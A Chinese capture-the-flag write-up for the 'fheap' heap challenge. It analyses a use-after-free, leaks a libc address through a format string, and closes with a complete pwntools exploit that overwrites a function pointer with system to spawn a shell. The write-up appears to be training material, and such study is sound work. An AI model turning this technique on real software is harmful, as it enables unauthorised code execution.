CTF-PWN-堆-【use after free-2】

fheap libc 2.23 64位

检查

main

多层while，其实和选择也差不多

create

分配0x20的堆，指针赋值给ptr
首先输入size大小
然后输入到buf当中
再看实际的buf的有多少，如果大于15就用malloc分配实际长度的堆，其指针为dest，然后将buf的内容复制进去，同时更新ptr里的内容，前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址，此时对应的函数free两次，先free存储内容的指针，再free原ptr指针
如果小于15，就直接将buf的内容赋值到ptr的开始部分，然后初始地址过24个字节开始被赋值函数的地址，此时对应的函数free一次
最后将遍历unk_2020c0数组 ，每个数组元素16个字节，前八个字节赋值为1，后八个字节赋值为ptr

delete

先根据索引检查unk_2020c0后24个字节是否为值，有值则存在这个string，然后输入yes后调用ptr中的free函数，参数为ptr，最后将此时索引的unk_2020c0前八个字节设置为0

思路

依然存在use after free漏洞，可以使得create时能得到可以修改原来存储string相关信息的堆中的存储函数指针的内容

首先create两次，此时只有两个堆，都是0x20，且都存储string的相关信息（delete时的调用的函数指针），然后申请一个大小0x20的string，此时可利用格式化字符串泄露某个函数的地址，然后得到libc基地址，然后再得到system的地址
然后delete该申请的string 再次create此时可以重写之前一开始id为1的堆块内容中的函数指针,此时为system的函数地址，并且刚该开始的堆内容为/bin/sh，此时再次delete（1）即可成功getshell

覆盖目标函数的指针

选用printf函数指针
函数装入内存时，由于地址随机化不会影响到低12位的值，此时可能可以成功覆盖到目的函数

printf内部

test指令（按位与）检查如果不是零就会执行movaps

movaps指令处理的内存位置必须是十六字节对齐的

如果不是零，就没有跳转，那么会执行movaps，满足十六字节对齐比较麻烦
所以我们先通过执行前面的存在的赋值ax为零的指令即可

调用覆盖的函数前

EAX与AX不是独立的，EAX是32位的寄存器，而AX是EAX的低16位。
举例来说
mov eax, 12345678h
那么AX将会是eax的低16位，也就是5678h。
而如果此时
mov ax，3344h
那么eax的值将变为12343344h，所以对ax的赋值是会影响eax的。
同样，AH是ax的高8位，而AL是ax的低8位，这就是说ah为33h，al为44h。

跳转后先执行mov eax,0

调用 printf时的栈

栈的第172个是libc_start_main+240

实际去的函数的地方

所以此时还需输入，此时想直接跳过这个地方输入只要输入一次-1就好了

查找当前版本对应的libc_start_main和system

计算出system的libc基地址

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
s=process("./pwn-f")
libc=ELF("./libc-2.23.so")
f=ELF("./pwn-f")
# gdb.attach(s,"b main")

def create(size,string):
    s.sendlineafter(b"3.quit\n",b"create ")
    s.sendlineafter(b"Pls give string size:",str(size))
    s.sendafter(b"str:",string)# 注意此时不能用sendlineafter，内容中会在后面有一个换行府，在覆盖函数底地址会多覆盖一个字节

def delete(id):
    s.sendlineafter(b"3.quit\n",b"delete ")
    s.sendlineafter(b"id:",str(id))
    s.sendlineafter(b"Are you sure?:",b"yes")


create(8, "ab") 
create(8, "ab") 

delete(1)
delete(0)

create(0x20, b'_libc_s_m+240:%176$pend'.ljust(0x18, b'c') + p8(0xB6))  # 0

delete(1)

s.recvuntil(b"_libc_s_m+240:")
libc_start_main_240= s.recvuntil("end", drop=True) # False是包括end

print(type(libc_start_main_240))
libc_start_main_240=int(libc_start_main_240,16) # 0x 形式的字节的转化为16进制数

system_addr = libc_start_main_240-240-0x20750+0x453a0

print("__libc_start_main_240: " + hex(libc_start_main_240))
print("system address: " + hex(system_addr))

s.sendline("-1")
delete(0)

create(0x20, b"/bin/sh;".ljust(24, b"p") + p64(system_addr))

delete(1)

s.interactive()